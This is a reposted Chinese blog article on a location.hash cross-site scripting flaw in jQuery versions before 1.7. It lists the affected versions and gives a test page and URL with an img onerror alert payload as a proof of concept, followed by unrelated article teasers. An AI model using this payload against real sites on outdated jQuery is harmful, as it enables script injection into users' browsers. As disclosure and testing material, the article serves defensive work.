版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷

版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷

news/2024/11/23 13:23:16/文章来源:https://blog.csdn.net/hanghangaidoudou/article/details/77182595

jquery下载地址：https://code.jquery.com/jquery/

影响范围：

版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷，可能导致LOCATION.HASH跨站漏洞

已测试成功版本：

jquery-1.6.min.js，jquery-1.6.1.min.js，jquery-1.6.2.min.js

jquery-1.5所有版本

jquery-1.4所有版本

jquery-1.3所有版本

jquery-1.2所有版本

测试：

启动nginx，并建立index.html页面，内容如下：

漏洞发现者给的测试代码：

<html>

<head>

<title>JQuery-xss-test</title>

<script src="-test-https://code.jquery.com/jquery-1.6.1.min.js"></script>

<script>

$(function(){

try { $(location.hash) } catch(e) {}

})

</script>

</head>

<body>

Jquery xss test.

</body>

</html>

访问地址：

http://localhost/#<img src=/ οnerrοr=alert(/F4ckTeam/)>

测试截图：

技术分享

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/387555.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

RabbitMQ学习总结（6）——消息的路由分发机制详解

RabbitMQ学习总结（6）——消息的路由分发机制详解

2019独角兽企业重金招聘Python工程师标准>>> 一、Routing(路由) (using the Java client)在前面的学习中，构建了一个简单的日志记录系统，能够广播所有的日志给多个接收者，在该部分学习中，将添加一个新的特点&#xff0…

阅读更多...

Kaggle爆文：一个框架解决几乎所有机器学习问题

Kaggle爆文：一个框架解决几乎所有机器学习问题

上周一个叫 Abhishek Thakur 的数据科学家，在他的 Linkedin 发表了一篇文章 Approaching (Almost) Any Machine Learning Problem，介绍他建立的一个自动的机器学习框架，几乎可以解决任何机器学习问题，项目很快也会发布出来。这篇…

阅读更多...

C# HttpWebRequest GET HTTP HTTPS 请求

C# HttpWebRequest GET HTTP HTTPS 请求

这个需求来自于我最近练手的一个项目，在项目中我需要将一些自己发表的和收藏整理的网文集中到一个地方存放，如果全部采用手工操作工作量大而且繁琐，因此周公决定利用C#来实现。在很多地方都需要验证用户身份才可以进行下一步操作，…

阅读更多...

Mysql学习总结（4）——MySql基础知识、存储引擎与常用数据类型

Mysql学习总结（4）——MySql基础知识、存储引擎与常用数据类型

2019独角兽企业重金招聘Python工程师标准>>> 1、基础知识 1.1、数据库概述简单地说：数据库（Database或DB）是存储、管理数据的容器；严格地说：数据库是“按照某种数据结构对数据进行组织、存储和管理的容器”…

阅读更多...

django权限二(多级菜单的设计以及展示)

django权限二(多级菜单的设计以及展示)

多级权限菜单设计级标题栏我们现在只有数据展示,要进入其他url还需要手动的输入路径,非常的麻烦,所以我们要设计一个导航栏以及侧边多级菜单栏,这个展示是通过stark组件的设计的增删改查页面,而每一个页面我们都需要有导航栏和侧边的权限菜单栏,所以把这个公共的部分提起到…

阅读更多...

腾讯手游如何提早揭露游戏外挂风险？

腾讯手游如何提早揭露游戏外挂风险？

目前腾讯SR手游安全测试限期开放免费专家预约！点击链接：手游安全测试立即预约！ 作者：sheldon，腾讯高级安全工程师商业转载请联系腾讯WeTest获得授权，非商业转载请注明出处。文中动图无法显示&#xff0c…

阅读更多...

下面介绍一个开源的OCR引擎Tesseract2。值得庆幸的是虽然是开源的但是它的识别率较高，并不比其他引擎差劲。网上介绍Tessnet2也是当时时间排名第三的识别引擎，只是后来慢慢不维护了，目前是G

下面介绍一个开源的OCR引擎Tesseract2。值得庆幸的是虽然是开源的但是它的识别率较高，并不比其他引擎差劲。网上介绍Tessnet2也是当时时间排名第三的识别引擎，只是后来慢慢不维护了，目前是G

下面介绍一个开源的OCR引擎Tesseract2。值得庆幸的是虽然是开源的但是它的识别率较高，并不比其他引擎差劲。网上介绍Tessnet2也是当时时间排名第三的识别引擎，只是后来慢慢不维护了，目前是Google在维护，大家都知道Google 在搞电子…

阅读更多...

分UV教程

分UV教程

第一步首先，打开一个练习场景“空中预警机1.max”（这事小弟平时的练习做的不好献丑了）。（图01） 图01 第二步这里我们拿机翼来举例子，隐藏除机翼意外的其他模型。（图02） 图02 第三步…

阅读更多...

k8s系列--- dashboard认证及分级授权

k8s系列--- dashboard认证及分级授权

http://blog.itpub.net/28916011/viewspace-2215214/ 因版本不一样，略有改动 Dashboard官方地址： https://github.com/kubernetes/dashboard dashbord是作为一个pod来运行，需要serviceaccount账号来登录。先给dashboad创建一个专用的认证信息…

阅读更多...

JAVA项目开发

JAVA项目开发

16年java软件开发经验，全职项目开发，项目可签合同、开普票和专票。主要承接项目： 1、网站开发项目自主开发千帆CMS动态发布系统，基于java/springboot2/jpa/easyui开发，简单易用，后台与前端分离&#xff0…

阅读更多...

unity3d 任务头上的血条

unity3d 任务头上的血条

人物的名称与血条的绘制方法很简单，但是我们需要解决的问题是如何在3D世界中寻找合适的坐标。因为3D世界中的人物是会移动的，它是在3D世界中移动，并不是在2D平面中移动，但是我们需要将3D的人物坐标换算成2D平面中的坐标&#xff0…

阅读更多...

unity3d 预制体

unity3d 预制体

首先要说明一下什么是预制体？ 在Unity3D里面我们叫它Prefab；我们也可以这样理解：当制作好了游戏组件（场景中的任意一个gameobject ）,我们希望将它制作成一个组件模版，用于批量的套用工作，例如说…

阅读更多...

Python小数据池，代码块

Python小数据池，代码块

今日内容一些小的干货一. id is 二. 代码块三. 小数据池四. 总结python小数据池，代码块的最详细、深入剖析一. id is 二. 代码块三. 小数据池四. 总结一，id，is， 在Python中，id是什么？id是内存地址…

阅读更多...

【Wax】使用Wax （framework方式，XCode 4.6）

【Wax】使用Wax （framework方式，XCode 4.6）

前情提示：【Wax】使用Wax （非framework方式，XCode 4.6） 这次，将以framework的方式来使用Wax 那么，让我们开始吧！！！ 准备工作： 下载wax.framework：…

阅读更多...

unity3d 简单动画

unity3d 简单动画

1，动画系统配置创建游戏对象并添加Animation组件，然后将动画文件拖入组件。进入动画文件的Debug属性面板选中Legacy属性选中游戏对象，打开Animation编辑窗口添加动画变化属性需改关键帧的属性值配置完成后运行即可得到动画效果 2&…

阅读更多...

3dmax导出到unity3d下分割动画

3dmax导出到unity3d下分割动画

1、在3dmax 导出时候，要导出FBX文件，同时包含动画，骨骼，皮肤等内容 2、把FBX文件导入到Unity3d后会默认有一个超长的大动画，就是一个整体的动画，如图Take001，这个时候要分割哪部分是跑&#xf…

阅读更多...

Unity3d之AssetBundle打包与读取

Unity3d之AssetBundle打包与读取

一、创建Assetbundle 在unity3d开发的游戏中，无论模型，音频，还是图片等，我们都做成Prefab，然后打包成Assetbundle，方便我们后面的使用，来达到资源的更新。一个Assetbundle可以打包一个模型&…

阅读更多...

unity3d 各个目录的意思

unity3d 各个目录的意思

1.首先，你得理解Unity中各个目录的意思？ 我这里说的是移动平台（安卓举例），读，写。所谓读，就是你出大版本的包之后，这个只读的话，就一辈子就这些东西了，不会改…

阅读更多...

asp.net core根据用户权限控制页面元素的显示

asp.net core根据用户权限控制页面元素的显示

asp.net core根据用户权限控制页面元素的显示 Intro 在 web 应用中我们经常需要根据用户的不同允许用户访问不同的资源，显示不同的内容，之前做了一个 AccessControlHelper 的项目，就是解决这个问题的。 asp.net core 支持 TagHelper 和基于 …

阅读更多...

Java面向对象（二）

Java面向对象（二）

source:http://blog.java1234.com/index.html?typeId1 Java类的继承 1，继承定义以及基本使用定义：子类能够继承父类的属性和方法； 注意点：Java中只支持单继承； 私有方法不能继承； 2，方法重写 …

阅读更多...

推荐文章

最新文章